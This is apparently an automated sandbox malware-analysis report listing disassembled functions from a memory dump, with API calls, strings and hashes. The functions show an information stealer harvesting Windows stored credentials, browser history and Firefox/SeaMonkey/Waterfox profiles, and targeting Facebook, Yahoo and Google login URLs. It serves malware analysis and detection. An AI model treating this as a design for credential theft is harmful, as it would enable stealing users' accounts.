                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                          • API String ID: 2941347001-70141382
                                          • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                          • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                          Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 701 44671d-446726 699->701 702 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->702 704 446747-44674b 701->704 705 446728-44672d 701->705 710 4467ac-4467b7 __setusermatherr 702->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 702->711 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 709 446755-446758 706->709 708->700 712 44673d-446745 708->712 709->702 710->711 715 446810-446819 711->715 716 44681e-446825 711->716 712->709 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 722 446834-446838 718->722 723 44683a-44683e 718->723 720 446845-44684b 719->720 721 446872-446877 719->721 725 446853-446864 GetStartupInfoW 720->725 726 44684d-446851 720->726 721->719 722->718 722->723 723->720 727 446840-446842 723->727 729 446866-44686a 725->729 730 446879-44687b 725->730 726->725 726->727 727->720 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                          • String ID:
                                          • API String ID: 2827331108-0
                                          • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                          • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                          Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 0040C298
                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                          • wcschr.MSVCRT ref: 0040C324
                                          • wcschr.MSVCRT ref: 0040C344
                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                          • GetLastError.KERNEL32 ref: 0040C373
                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                          • String ID: visited:
                                          • API String ID: 1157525455-1702587658
                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                          Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 ??3@YAXPAX@Z 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                                          APIs
                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                          • memset.MSVCRT ref: 0040E1BD
                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                          • _snwprintf.MSVCRT ref: 0040E257
                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                          • API String ID: 3883404497-2982631422
                                          • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                          • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                          Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                          • memset.MSVCRT ref: 0040BC75
                                          • memset.MSVCRT ref: 0040BC8C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                          • memcmp.MSVCRT ref: 0040BCD6
                                          • memcpy.MSVCRT ref: 0040BD2B
                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                          • String ID:
                                          • API String ID: 509814883-3916222277
                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                          Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError ??3@YAXPAX@Z 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 ??3@YAXPAX@Z 870->877 871->870 877->855
                                          APIs
                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                          • GetLastError.KERNEL32 ref: 0041847E
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CreateFile$??3@ErrorLast
                                          • String ID: |A
                                          • API String ID: 1407640353-1717621600
                                          • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                          • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                          Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                          • String ID: r!A
                                          • API String ID: 2791114272-628097481
                                          • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                          • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                          Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                          • _wcslwr.MSVCRT ref: 0040C817
                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                          • wcslen.MSVCRT ref: 0040C82C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                          • API String ID: 62308376-4196376884
                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                          Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                          • wcslen.MSVCRT ref: 0040BE06
                                          • _wcsncoll.MSVCRT ref: 0040BE38
                                          • memset.MSVCRT ref: 0040BE91
                                          • memcpy.MSVCRT ref: 0040BEB2
                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                          • wcschr.MSVCRT ref: 0040BF24
                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                          • String ID:
                                          • API String ID: 3191383707-0
                                          • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                          • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                          Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00403CBF
                                          • memset.MSVCRT ref: 00403CD4
                                          • memset.MSVCRT ref: 00403CE9
                                          • memset.MSVCRT ref: 00403CFE
                                          • memset.MSVCRT ref: 00403D13
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 00403DDA
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                          • String ID: Waterfox$Waterfox\Profiles
                                          • API String ID: 3527940856-11920434
                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                          Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00403E50
                                          • memset.MSVCRT ref: 00403E65
                                          • memset.MSVCRT ref: 00403E7A
                                          • memset.MSVCRT ref: 00403E8F
                                          • memset.MSVCRT ref: 00403EA4
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 00403F6B
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                          • API String ID: 3527940856-2068335096
                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                          Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00403FE1
                                          • memset.MSVCRT ref: 00403FF6
                                          • memset.MSVCRT ref: 0040400B
                                          • memset.MSVCRT ref: 00404020
                                          • memset.MSVCRT ref: 00404035
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 004040FC
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                          • API String ID: 3527940856-3369679110
                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                          Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                          • API String ID: 3510742995-2641926074
                                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                          Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                          • memset.MSVCRT ref: 004033B7
                                          • memcpy.MSVCRT ref: 004033D0
                                          • wcscmp.MSVCRT ref: 004033FC
                                          • _wcsicmp.MSVCRT ref: 00403439
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                          • String ID: $0.@
                                          • API String ID: 3030842498-1896041820
                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                          Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
